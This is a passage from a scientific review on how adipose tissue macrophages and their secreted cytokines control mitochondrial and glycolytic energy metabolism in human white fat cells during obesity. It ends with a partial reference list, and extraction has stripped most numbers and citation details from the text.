recently proposed, which can be activated by the wat-specific environment (hormones and nutrients) ( ). indeed, the wat-specific microenvironment and/or the long retention time of mΦ in wat during obesity may be the cause for the unique phenotype of atmΦ. data on monocytes/mΦ during obesity reveal higher immigration rates into obese wat ( ) and lower emigration rates ( ), indicating longer exposure times for atmΦ in the wat microenvironment during obesity. dissecting the different spatiotemporal phenotypes of human atmΦ, including their secreted cytokines, chemokines and other factors, either during acute or chronic metabolic challenges (e.g. feeding/fasting, different diets, exercise, cold), is a challenging task. however, further insights on the role of atmΦ in wat metabolism and dysfunction would be gained from those studies, including the potential to distinguish and classify subgroups of obese patients with high risk for certain obesity-associated metabolic complications (e.g. nafld, cardiovascular complications). in summary, atmΦ assist the maintenance of normal tissue function, such as adipokine secretion, healthy lipid storage and adaptation toward metabolic challenges (e.g. cold, exercise, fasting) (fig.  c). in obesity, the amount of atmΦ increases through the combination of proliferation, immigration and retention. atmΦ accumulate around dead adipocytes in crown-like structures and change their phenotype. indeed, atmΦ of the obese display altered secretion profiles, surface marker expression and metabolic function, thereby contributing to the overall (dys)function of wat, which will eventually impact whole body metabolic homeostasis. the bioenergetics of human white fat cells mitochondrial activity is important for lipid storage and secretory function of human white adipocytes synthesis of atp through oxidative phosphorylation (oxphos) is a major function of mitochondria to provide sufficient cellular energy. therefore, energy-demanding adipose-specific functions, such as endocrine signaling and lipid storage, highly depend on adequate mitochondrial activity. indirectly, mitochondria also control free fatty acid (fa) levels as the consequence of lipid storage control. beyond atp production, mitochondria also generate metabolic intermediates that are required for de novo lipogenesis. for example, the mitochondrial pyruvate dehydrogenase complex (pdh) decarboxylates pyruvate to acetyl-coa, and thereby regulates glyceroneogenesis and the metabolic switch from glucose to lipid metabolism ( ). a similar regulating role of mitochondria is found for the reverse process of lipolysis, the breakdown of lipids. lipolysis and mitochondrial activity are closely linked as mitochondria facilitate lipolysis through fa oxidation. furthermore, free fa can uncouple mitochondrial chain activity from atp synthesis and enhance respiratory activity, while inhibitors of mitochondrial atp production can abolish catecholamine-stimulated lipolysis ( , , ). mitochondria are also important players in the regulation of ca + homeostasis ( ), tying into the well- documented calcium-dependent processes in adipocytes during insulin-stimulated glucose uptake, leptin secretion and adipogenesis ( , , , , ). furthermore, adequate mitochondrial activity is required to execute the endocrine function of wat (e.g. adiponectin secretion ( )). finally, the basic processes of adipocyte differentiation and maturation are closely linked to the initiation of de novo mitochondrial biogenesis and reactive oxygen species (ros) production ( , ). collectively, mitochondrial activity of adipocytes has an impact on all the essential and specialized functions of wat, even those that control distantly the processes that maintain systemic homeostasis. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : the bioenergetic profile of (pre-)adipocytes and the regulation by nutrients and hormones as most proliferating progenitor cells, human subcutaneous preadipocytes depend mainly on glycolytic atp production (~ % from glycolysis vs % from oxphos, fig.  ) ( ). during adipogenic differentiation, the mitochondrial content increases several fold ( ) and the relative contribution of oxphos to total atp production increases to – % in human adipocytes ( , ). comparing mitochondrial oxygen consumption rates (ocrs) revealed four- to five-fold higher ocr in adipocytes as compared with preadipocytes (sgbs and primary cells) ( , ). of note, at least under in vitro conditions, glycolysis seems to be the preferred energy-producing pathway in both, preadipocytes and mature adipocytes. adipocytes partially switch from oxphos to glycolysis in the presence of glucose. in the absence of glucose, however, only adipocytes, but not preadipocytes, are able to maintain their atp demand by increasing mitochondrial activity. therefore, mitochondria in human adipocytes allow for the high flexibility in substrate choice to maintain their energy metabolism ( ). visceral adipocytes show lower mitochondrial activity than subcutaneous, when calculated per cell and normalized for mitochondrial content ( , ). when comparing isolated mitochondria from subcutaneous and visceral adipocytes, no significant difference in mitochondrial function was observed ( ). this indicates that differences in energy metabolism between visceral and subcutaneous adipocytes, and wat depots, do not depend on intrinsic mitochondrial capacity. instead, cellular capacity of oxphos may depend on mitochondrial mass per cell (e.g. higher mitochondrial density in visceral than subcutaneous adipocytes ( )), the control of mitochondrial function at the cellular level (e.g. higher beta- adrenergic receptor mrna levels in viscwat than in scwat ( )) and the depot-specific surrounding (e.g. higher vascularization in viscwat than scwat ( )), including the inflammatory environment created by mΦ (higher concentration of cytokines such as il in viscwat than scwat ( )). upon adrenergic activation, subcutaneous adipocytes of lean humans display increased ocr that associates with increased lipolysis ( ). in parallel, extracellular acidification rates (ecars), which estimate glycolytic activity, are increased ( ). notably, the extracellular acidification may also derive from increased carbon dioxide production of the tca cycle (dissolved as carbonic acid), and therefore, partially unrelated to glycolysis. insulin stimulation of subcutaneous adipocytes from obese donors leads to increased glycolytic activity and simultaneously, to decreased atp-linked respiration ( ). whether this response is different in adipocytes from lean donors, or different in visceral adipocytes, needs to be determined. overall, the high capacity of mitochondrial oxphos, that is linked to trigacylglycerol/fa cycling activity and induced by hormones and nutrients, is essential for metabolic flexibility of wat ( , , ), representing a marker of healthy adipocytes (fig.  ). obesity-induced changes in the bioenergetics of white adipocytes decreased mitochondrial function in white adipocytes leads to dysfunction in lipid storage and endocrine figure  the dynamics of adipocyte energy metabolism. oxygen consumption rates (ocrs), representing mitochondrial function, are plotted against extracellular acidification rates (ecars), representing an estimate for glycolytic activity. both pathways fuel cellular atp demands, are complementary and display metabolic flexibility, in particular in healthy, lean adipocytes (orange). preadipocytes (yellow) display lower ocr, higher ecar and less metabolic flexibility. during adipogenic differentiation, glycolytic atp production is replaced by oxidative phosphorylation (oxphos). oxphos increases about five-fold, and its contribution to cellular atp increases from % in preadipocytes (yellow circle) to ~ % in adipocytes (orange circle) under basal, normoglycemic conditions. adipocytes in lean wat display high flexibility of ocr and ecar, depending on nutrient availability (e.g. glucose: % oxphos in hyperglycemic (green circle) and % oxphos in hypoglycemic (blue circle) conditions), depending on hormonal input (e.g. catecholamine (brown circle) induces simultaneous glycolysis and oxphos = increased metabolic activity; insulin (green circle) suppresses oxphos and increases glycolysis = metabolic shift), and depending on inflammatory mediators (e.g. tnfα (pink circle) is suspected to reduce ocr and ecar = metabolic depression). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : function of wat ( , ) that associate with obesity-induced metabolic complications such as insulin resistance ( ) (fig.  ). several studies demonstrate reduced mitochondrial content and activity of subcutaneous and visceral adipocytes from obese donors ( , , , , ) independent of fat cell size ( , ). furthermore, subcutaneous adipocytes from obese donors show lower ocr responses after β-adrenergic stimulation as compared to lean individuals ( ). the depression of atp metabolism in adipocytes from obese donors is supported by data on lower mitochondrial activity, reduced lipid accumulation and insulin-stimulated glucose uptake, as compared to sgbs adipocytes, which represent a model for lean, insulin-sensitive human white subcutaneous adipocytes ( ). in line with these observations, previous studies on basal heat production of primary (‘floating’) adipocytes from lean vs obese humans revealed an obesity-related reduction in heat output by ~ % ( ). interestingly, not only impaired mitochondrial function but also altered glycolytic activity in adipocytes is associated with obesity. higher lactate secretion of wat from obese patients has been reported previously, indicating higher glycolytic fluxes, impaired conversion of lactate to pyruvate and/or impaired pyruvate import into the mitochondria ( , , ). this is in line with suggestions on the increased requirement of glycolytic energy production during insulin resistance ( ). under hypoxic condition, adipocytes show increased glucose uptake, leading to glycogen accumulation that has been linked to impaired adipokine secretion ( ). additionally, mitochondrial uncoupling in adipocytes, either induced by overexpressing uncoupling protein (ucp ) or by administration of chemical uncouplers such as fccp, results in less atp yield from oxphos. this is usually compensated by the increase of glycolytic energy production. if the compensation fails to maintain atp homeostasis, adipocytes show reduced lipid accumulation, possibly by diverting glucose-derived carbon flux away from fatty acid synthesis into lactate production ( , , , ). this reduction in lipid accumulation capacity of adipocytes may lead to the adverse lipid accumulation in other organs (e.g. nafld), a commonly seen feature in metabolically unhealthy obese patients ( ). thus, appropriate functionality, balance and regulation of the main energy-producing pathways, oxidative phosphorylation and glycolysis, is important for metabolic flexibility to retain healthy adipocytes. any perturbation of these metabolic processes leads to metabolic imbalances and adverse outcomes for the whole metabolic system of the body. in summary (fig.  ), healthy adipocytes possess the adequate mitochondrial mass and activity, allowing a wide scope of metabolic responses to hormones such as insulin and adrenaline. mitochondrial function is required for insulin-stimulated glucose metabolism and adrenergic-stimulated oxphos capacity, allowing for rapid adjustments of energy metabolism. obesity is characterized by lower mitochondria number and activity, altered basal/insulin-stimulated glucose metabolism and figure  obesity-associated impaired energy metabolism in white adipocytes. in lean wat, high mitochondrial mass and activity in adipocytes allow for high metabolic flexibility. oxphos and glycolysis are adjusted in response to hormonal regulation (insulin and adrenergic activation). visceral adipocytes display lower mitochondrial activity than subcutaneous adipocytes (normalize per cell and mitochondrial content). contrasting lean wat, obese wat is characterized by lower mitochondrial mass and activity, impaired glucose metabolism and dampened hormonal responses. obesity overall renders adipocytes metabolically inflexible. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : lower adrenergic-stimulated oxphos. therefore, it is not surprising that unhealthy adipocytes are less metabolically flexible. linking atmΦ to human adipocyte bioenergetics metabolically healthy (vs unhealthy) obesity is characterized by dampened inflammatory molecular signatures in wat and lower levels of circulating inflammation markers (tnfα and hcrp) ( , , , ). together, this indicates the link between inflammation and dysregulated metabolism. early observations by weisberg et  al. that showed obesity- associated increases in atmΦ content, also reported on the decreased expression of several mitochondria-related genes ( ). cytokines are potential candidates mediating the crosstalk between atmΦ and the energy metabolism of adipocytes (fig.  ). typical cytokines involved in wat inflammation are tnfα, il and il β. these cytokines promote insulin resistance and/or induce lipolysis ( , , , ). notably, some of these and other cytokines suppress mitochondrial function ( ) (fig.  b). the crosstalk between atmΦ and adipocytes is certainly bidirectional, and dysfunctional adipose mitochondria possibly promote wat inflammation as well ( ). this review, however, will focus on the effects of atmΦ in controlling adipocyte mitochondria. in vivo, the paracrine interactions between atmΦ and adipose cells are complex, as mΦ are very dynamic cells with a changing cytokine profile that is influenced by adipokines ( , ), sympathetic nerve activation ( ), as well as insulin and nutrients ( ). atmΦ could represent a distinct subpopulation in wat with a unique, not yet fully characterized phenotype that is altered during obesity (as discussed in the sections above). thus, studying ex vivo the effects of mΦ-conditioned media, which represent the global secretome of mΦ, provides only a rudimentary picture of the effects that mΦ-derived products impose on fat cell bioenergetics. this ex vivo system, however, enables us to identify the factors, signaling pathways and mechanisms that can be further investigated and targeted in vivo to modulate mitochondrial function of adipocytes. atmΦ and secreted factors affect glucose metabolism/glycolysis of adipocytes using conditioned media from lps-activated mΦ (mΦ- cm), lumeng et al. observed higher basal glucose uptake in adipocytes in a murine cell culture system ( t -l adipocytes and raw . or j macrophages) ( ). in line with this, we demonstrated higher glycolytic activity in adipocytes after incubation with either lps/infγ-activated mΦ-cm or il /tgfβ-activated mΦ-cm ( ), using a human model system composed of sgbs cells, a human subcutaneous adipocyte model figure  control of adipocyte energy metabolism. in the wat-specific environment (yellow background), multiple cytokines/chemokines, metabolites, lipid species and hormones from diverse cell types within wat and/or circulation can exert either positive (upper box, a) or negative (lower box, b) effects on wat metabolism. these factors control mitochondrial function of (pre-)adipocytes either directly and/or indirectly by first affecting the atmΦ secretion profile. notably, the composition of released factors depends on mΦ activation (known for factors written in blue/green). depending on the tgfβ superfamily (bmps and gdfs), wat metabolism is either promoted or suppressed. a recently identified but controversially discussed mechanism of mΦ invoked browning and enhanced wat metabolism is the secretion of catecholamine by il -activated mΦ during cold and exercise (upper box, a). on the contrary, nams/sams (lower box, b), which represent mΦ in close proximity of neurons/axons, may reduce local catecholamine levels and thus suppress mitochondrial function of adipocytes with age and obesity. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : and thp cells, a human monocytic cell line that can be differentiated into mΦ and subsequently activated with different stimuli ( ). overall, atmΦ possess the potential to increase basal glucose uptake in adipocytes. the potential responsible factors comprise the classical inflammatory cytokines which are associated with obese wat inflammation, such as tnfα and il β. controversial reports exist for il , which is a cytokine that has often been associated with wat inflammation ( , , ). furthermore, a few studies report on reduced insulin- stimulated glucose uptake after exposing adipocytes to either different mΦ-cm, or to cytokines, such as tnfα, ccl and il β, which are mostly linked to the decreased activation of insulin signaling cascades ( , , , , ). of note, many studies show the percentage or fold- changes of glucose uptake vs vehicle ( nm insulin), not fully excluding the possibility that the reduced response in these studies may be due to increased basal glucose uptake, at least partially. the molecular identity of atmΦ released factors reducing adipose energy metabolism maintenance of cellular homeostasis requires a constant production of atp unless specific, energy-demanding tasks are performed. therefore, increased basal glucose uptake may report increased energy demand. however, increased basal glucose uptake may equally report a compensatory mechanism to counter fit decreased oxphos activity (atp-linked respiration). the latter scenario describes a switch in the energy producing pathways, rather than the increase in metabolic activity. il /tgfβ-activated mΦ and/or il β promote such a metabolic switch in adipocytes by increasing glucose uptake/glycolysis while simultaneously decreasing mitochondrial activity ( , ) (fig.  b). il β also inhibits camp- and isoproterenol-induced pgc a and ucp mrna levels ( , ), further supporting the il β signaling pathway in suppressing oxidative metabolism of adipocytes. tnfα represents a cytokine that appears to reduce major energy-producing pathways, glycolysis and oxphos. the lowering in production of cellular energy subsequently results in adipocyte death, finally seen as the loss of mitochondrial membrane potential and cleaved caspase- ( ). notably, tnfα levels and mitochondrial mass correlate negatively in human wat ( , ). whether the secretome of the ‘metabolically’ activated mΦ in obese wat ( ) is significantly involved in decreased adipose mitochondrial function is not known as yet (fig.  b). atmΦ and their secreted factors may, however, not only directly affect adipocyte energy metabolism, but also indirectly by altering neuronal signals into the tissue. one of those signals is catecholamine, which enhances energy dissipation. two mechanisms have been described how mΦ may limit bioactive catecholamine in wat and brown adipose tissue (bat): one mechanism proposes the inhibition of neuronal innervation. bat-specific mΦ inhibit sympathetic neuronal innervation and thereby impair catecholamine signaling in bat, while wat innervation is not affected ( ). the other mechanism proposes neurotransmitter clearance. a distinct mΦ-type that is attached, or at least in close proximity, to axons of the sns takes up and degrades norepinephrine (ne). these mΦ have been termed either sympathetic neuron- associated mΦ (sams) ( ) or nerve-associated mΦ (nams) ( ). so far, sams/nams have been identified in murine viscwat ( ) and scwat ( ), but not unequivocally in murine bat ( ). sams/nams may regulate local catecholamine concentrations and prevent catecholamine spill over into the circulation ( , , ). the mΦ- mediated ne uptake and degradation system is apparently enhanced during obesity (increased number of sams ( )) and aging (gdf -dependent increased expression of genes controlling ne degrading in nams ( )), and potentially contribute to decreased energy metabolism with age and obesity (fig.  b). mediators between atmΦ and increased adipose energy metabolism the interaction between atmΦ and increased wat energy metabolism is supported by mouse models that claim the involvement of mΦ in the ‘browning’ of wat upon cold exposure, exercise and caloric restriction ( , , , , ) (fig.  a). browning of wat has been classically defined as the upregulation of uncoupling protein (ucp ) and the appearance of multilocular adipocytes in wat, termed beige adipocytes. beige adipocytes associate with mitochondrial biogenesis and higher energy turnover. ucp resides in the mitochondrial inner membrane and uncouples the proton motive force from atp synthesis, thereby directly releasing energy as heat and accelerating catabolic processes. with this energy-burning machinery, the browning of wat can restore dysregulated glucose and lipid metabolism in diverse obese and diabetic mouse models ( , , , ). with these observations in mouse models, browning-inducing pathways have gained remarkable attention in biomedicine to treat metabolic diseases. in the context of browning, atmΦ may release this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : cytokines, which could induce ucp expression, higher energy turnover and energy wasting in adipocytes (fig.  a). several publications implicate il signaling in beige adipocyte formation and wat browning ( , , ), but some aspects of il -stimulated glucose uptake are controversial ( , , , ). another cytokine that affects wat energy metabolism, either directly or via mΦ, is il (fig.  a). il is secreted by mΦ and to a higher extent by eosinophils in wat ( ). it may directly control wat metabolism, by acting either on preadipocytes to promote differentiation into beige adipocytes, or on adipocytes to induce higher atp turnover ( , ). several publications place il -activated mΦ into immune signaling cascades that are able to induce ucp expression and mitochondrial activity in adipocytes. the il -mΦ axis can be modulated by additional factors of endocrine (e.g. released distantly from muscle ( )) and/or paracrine nature (e.g. released adjacently from other wat cell types, including eosinophils, type innate lymphoid cells, regulatory and natural killer t cells ( , , )). the underlying mechanisms how the il - mΦ system induces browning is not fully understood. in particular, the involvement of catecholamine-producing atmΦ is controversially discussed ( , ). although some reports on catecholamine synthesis in mΦ exist ( , , ), the physiological contribution during cold-induced thermogenesis seems to be of minor importance ( ). whether mΦ-mediated uptake ( ) or degradation of catecholamines (as shown for sams/nams ( , )) is inhibited and substantially contributes to cold-induced wat browning requires further investigations. additional candidates that impact mitochondrial function in adipocytes belong to the tgfβ superfamily. tgfβ inhibits the ‘browning’ of wat and stimulates proliferation of white adipocytes ( , , , ). our functional work demonstrated that il /tgfβ-activated mΦ secreted factors decrease atp-linked respiration in human subcutaneous adipocytes, thus providing evidence for indirect suppression of mitochondrial respiration by tgfβ ( ). several other members of the tgfβ superfamily have been proposed in the regulation of oxidative metabolism in adipocytes and the browning of wat, affecting whole body energy metabolism. many of these factors are indeed secreted by mΦ. whether these factors promote or suppress energy metabolism depends on the distinct factor or receptor, as well as on the adipose depot (bat or wat). examples for specific effects include bone morphogenetic proteins (bmp , , and b) ( , , , , , , ) and growth differentiation factors (gdf , , , ) ( , , , , , , ) (fig.  a and b). the effects also depend on the developmental stage of the adipocytes, whether the cytokine acts directly on the mesenchymal stem cell, on the early committed preadipocytes (brown, beige or white) or on the adipocytes, or whether the cytokine acts indirectly by changing mΦ infiltration and their phenotype ( , ). additionally, there are reports that these cytokines act on the central nervous system to control metabolism ( , ). other mediators between atmΦ and adipocyte metabolism are metabolites. upon activation, mΦ change their metabolomic profile ( , ), for example upon lps activation, more lactate and pyruvate are released ( ). lactate and acetate have been suggested as inducers of wat browning ( , , ). lipid mediators (e.g. oleoylethanolamine (oea), prostaglandin e (pge )) are differentially released by mΦ, depending on the mode of activation ( , , ). circulating metabolites and lipid mediators are involved in the browning of rodent wat ( , , ), indicating that these factors represent additional candidates by which mΦ modulate mitochondrial activity in white adipocytes (fig.  a). although mΦ may not be the main source for some cytokines or factors that have been linked to increased or decreased energy expenditure in wat (e.g. ifnγ, retinoic acid, catecholamine, il , lactate), the indirect involvement of these factors cannot be formally excluded ( , , , , , ). for instance, we have recently found increased atp-linked respiration in white adipocytes after exposure to the secreted factors of lps/ifnγ-activated mΦ ( ) (fig.  a). in summary (fig.  ), atmΦ can be activated by the wat-specific microenvironment which is impacted by circulating endocrine and auto-/paracrine factors (cytokines, nutrients and hormones). thus, the wat- specific environment is characterized by distinctly activated atmΦ and mΦ-secreted factors which contribute to the microenvironment but furthermore and the regulation of wat energy metabolism. during cold, exercise and fasting, the induction of adipose energy metabolism by enhancing beige adipocyte differentiation, inducing ucp expression, increasing atp turnover and/or increasing energy dissipating pathways such as catecholamine can be mediated by activated mΦ (e.g. lps/ifnγ- or il -activated mΦ) and mΦ released factors such as cytokines (il , il ), metabolites (lactate, acetate) and/or lipid mediators (pge , oea) (fig.  a). in the obese state, other activated mΦ (e.g. il /tgfβ- or ‘metabolically’ activated mΦ) and mΦ released factors such as cytokines (e.g. il β and tnfα) may decrease energy this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : metabolism of adipocytes or limit local energy dissipating pathways by uptake and degradation of catecholamine (by sam, nam) (fig.  b). several scenarios how these factors operate are conceivable, and they most likely overlap and work in concert, by direct action on mesenchymal stem cells, preadipocytes and adipocytes and by indirect signals via mΦ. indirect action may also occur via additional cell types in wat, including other immune cells (e.g. t cells), epithelial cells and neurons (not depicted in fig.  ). conclusion and outlook in the upcoming field of immunometabolism, which investigates the crosstalk between immune cell function and metabolic homeostasis, the understanding on paracrine regulation of human white adipocyte metabolism by atmΦ, is utterly important. by identifying the atmΦ-secreted factors that control mitochondrial function and energy metabolism in adipocytes, we may be able to find novel therapeutic targets to treat diseased wat during obesity. this new understanding of the metabolic network in wat needs to be resolved on the molecular level, investigating how controlling pathways are regulated under physiological and pathophysiological conditions. a detailed investigation is required on the atmΦ phenotypes/subpopulations and how fat depot-, gender- and age-specific atmΦ infiltration and activation are related to adipocytes, wat and whole body metabolism in health and disease. although this review focuses on the paracrine action of mΦ within the white adipose tissue, it should be considered that atmΦ contribute to the overall secretion profile of wat with factors that are released into the circulation for endocrine action causing systemic effects such as insulin resistance. it is feasible to speculate that these factors will not only impact the energy metabolism of adipocytes, but also as endocrine factors potentially impact the bioenergetics of other more distantly located target cells (such as hepatocytes and myocytes). furthermore, not only mΦ composition changes with obesity, but other immune cells, such as t cell, b cell, eosinophil, inkt and neutrophils change in number and activation state, contributing to the impaired immune balance in obese wat. thus, the complex microenvironment of adipose tissue that controls the bioenergetics of adipocytes is composed of multiple cytokines and cell types with multiple cellular targets. additionally, there is potentially a feed-back mechanism in place where adipocyte-secreted proteins and signals impact the immune cell secretome that in turn controls adipocyte metabolism. how the endocrine and nervous system that regulates metabolism (e.g. catecholamine, acetylcholine, insulin and glucagon) affects the crosstalk of atmΦ and fat cells represents another promising research topic. many other aspects require further investigation, concerning cytokine production and combinatorial effects on adipocytes, the interaction with energy storing and dissipating pathways, as well as the crosstalk between adipocytes and cell types other than atmΦ to control adipocyte glycolysis and mitochondrial function. owing to the profound differences in the immune system between mice and humans, it is of major importance to consolidate murine pathways and their impact on metabolism in humans. that said, however, it is promising that certain activated mΦ not only induce energy-producing pathways (glycolysis and oxphos) in white adipocytes, but possibly in an ucp -independent manner, suggesting new options to increase energy expenditure by targeting inflammatory pathways in wat. novel strategies in obesity therapy are required as obese and older subjects are usually characterized by the absence or low content of bat (ucp +-cells) ( ). whether the browning capacity of human subcutaneous wat can be enhanced to that extent that it eventually contributes significantly to systemic energy expenditure, is still an open question ( , ). beyond energy wasting in adipocytes, mitochondria are crucial for all cellular pathways (e.g. differentiation, apoptosis, energy dissipation, adipokine secretion), thus representing ubiquitous targets to treat obesity and its associated disorders. collectively, targeting inflammatory pathways in fat depots could be a feasible strategy for the treatment of metabolic diseases. declaration of interest the author declares that there is no conflict of interest that could be perceived as prejudicing the impartiality of this review. funding the original work of m k was supported by the german center for diabetes research (dzd) and the german diabetes association (ddg). acknowledgments the author would like to thank martin jastroch for helpful comments on the manuscript and proofreading. figures were created using modified components from servier medical art (https://smart.servier.com). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://smart.servier.com https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : references jansson pa, larsson a, smith u & lönnroth p. lactate release from the subcutaneous tissue in lean and obese men. journal of clinical investigation – . (https://doi.org/ . /jci ) kershaw ee & flier js. adipose tissue as an endocrine organ. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) trayhurn p. endocrine and signalling role of adipose tissue: new perspectives on fat. acta physiologica scandinavica – . (https://doi.org/ . /j. - x. . .x) kaaman m, sparks lm, van harmelen v, smith sr, sjölin e, dahlman i & arner p. strong association between mitochondrial dna copy number and lipogenesis in human white adipose tissue. diabetologia – . (https://doi.org/ . /s - - - ) kusminski cm & scherer pe. mitochondrial dysfunction in white adipose tissue. trends in endocrinology and metabolism – . (https://doi.org/ . /j.tem. . . ) koh eh, park jy, park hs, jeon mj, ryu jw, kim m, kim sy, kim ms, kim sw, park is, et al. essential role of mitochondrial function in adiponectin synthesis in adipocytes. diabetes – . (https://doi.org/ . /db - ) wang ch, wang cc, huang hc & wei yh. mitochondrial dysfunction leads to impairment of insulin sensitivity and adiponectin secretion in adipocytes. febs journal – . (https://doi.org/ . /febs. ) szkudelski t, nogowski l & szkudelska k. short-term regulation of adiponectin secretion in rat adipocytes. physiological research – . yin x, lanza ir, swain jm, sarr mg, nair ks & jensen md. adipocyte mitochondrial function is reduced in human obesity independent of fat cell size. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - ) heinonen s, buzkova j, muniandy m, kaksonen r, ollikainen m, ismail k, hakkarainen a, lundbom j, lundbom n, vuolteenaho k, et al. impaired mitochondrial biogenesis in adipose tissue in acquired obesity. diabetes – . (https://doi.org/ . /db - ) pietiläinen kh, naukkarinen j, rissanen a, saharinen j, ellonen p, keränen h, suomalainen a, götz a, suortti t, yki-järvinen h, et al. global transcript profiles of fat in monozygotic twins discordant for bmi: pathways behind acquired obesity. plos medicine e . (https://doi.org/ . /journal.pmed. ) fischer b, schöttl t, schempp c, fromme t, hauner h, klingenspor m & skurk t. inverse relationship between body mass index and mitochondrial oxidative phosphorylation capacity in human subcutaneous adipocytes. american journal of physiology: endocrinology and metabolism e –e . (https://doi. org/ . /ajpendo. . ) yehuda-shnaidman e, buehrer b, pi j, kumar n & collins s. acute stimulation of white adipocyte respiration by pka-induced lipolysis. diabetes – . (https://doi.org/ . /db - ) hotamisligil gs, shargill ns & spiegelman bm. adipose expression of tumor necrosis factor-alpha: direct role in obesity-linked insulin resistance. science – . (https://doi.org/ . / science. ) xu h, barnes gt, yang q, tan g, yang d, chou cj, sole j, nichols a, ross js, tartaglia la, et al. chronic inflammation in fat plays a crucial role in the development of obesity-related insulin resistance. journal of clinical investigation – . (https://doi. org/ . /jci ) cai d, yuan m, frantz df, melendez pa, hansen l, lee j & shoelson se. local and systemic insulin resistance resulting from hepatic activation of ikk-beta and nf-kappab. nature medicine – . (https://doi.org/ . /nm ) lanthier n, molendi-coste o, horsmans y, van rooijen n, cani pd & leclercq ia. kupffer cell activation is a causal factor for hepatic insulin resistance. american journal of physiology: gastrointestinal and liver physiology g –g . (https://doi.org/ . / ajpgi. . ) saghizadeh m, ong jm, garvey wt, henry rr & kern pa. the expression of tnf alpha by human muscle. relationship to insulin resistance. journal of clinical investigation – . (https://doi.org/ . /jci ) de souza ct, araujo ep, bordin s, ashimine r, zollner rl, boschero ac, saad mj & velloso la. consumption of a fat-rich diet activates a proinflammatory response and induces insulin resistance in the hypothalamus. endocrinology – . (https:// doi.org/ . /en. - ) ehses ja, perren a, eppler e, ribaux p, pospisilik ja, maor-cahn r, gueripel x, ellingsgaard h, schneider mkj, biollaz g, et al. increased number of islet-associated macrophages in type diabetes. diabetes – . (https://doi.org/ . /db - ) bondia-pons i, ryan l & martinez ja. oxidative stress and inflammation interactions in human obesity. journal of physiology and biochemistry – . (https://doi.org/ . /s - - - ) hahn ws, kuzmicic j, burrill js, donoghue ma, foncea r, jensen md, lavandero s, arriaga ea & bernlohr da. proinflammatory cytokines differentially regulate adipocyte mitochondrial metabolism, oxidative stress, and dynamics. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) qatanani m, tan y, dobrin r, greenawalt dm, hu g, zhao w, olefsky jm, sears dd, kaplan lm & kemp dm. inverse regulation of inflammation and mitochondrial function in adipose tissue defines extreme insulin sensitivity in morbidly obese patients. diabetes – . (https://doi.org/ . /db - ) weisberg sp, mccann d, desai m, rosenbaum m, leibel rl & ferrante aw. obesity is associated with macrophage accumulation in adipose tissue. journal of clinical investigation – . (https://doi.org/ . /jci ) wernstedt asterholm i, tao c, morley ts, wang qa, delgado- lopez f, wang zv & scherer pe. adipocyte inflammation is essential for healthy adipose tissue expansion and remodeling. cell metabolism – . (https://doi.org/ . /j. cmet. . . ) qiu y, nguyen kd, odegaard ji, cui x, tian x, locksley rm, palmiter rd & chawla a. eosinophils and type cytokine signaling in macrophages orchestrate development of functional beige fat. cell – . (https://doi.org/ . /j.cell. . . ) rao rr, long jz, white jp, svensson kj, lou j, lokurkar i, jedrychowski mp, ruas jl, wrann cd, lo jc, et al. meteorin-like is a hormone that regulates immune-adipose interactions to increase beige fat thermogenesis. cell – . (https://doi. org/ . /j.cell. . . ) nguyen kd, qiu y, cui x, goh yps, mwangi j, david t, mukundan l, brombacher f, locksley rm & chawla a. alternatively activated macrophages produce catecholamines to 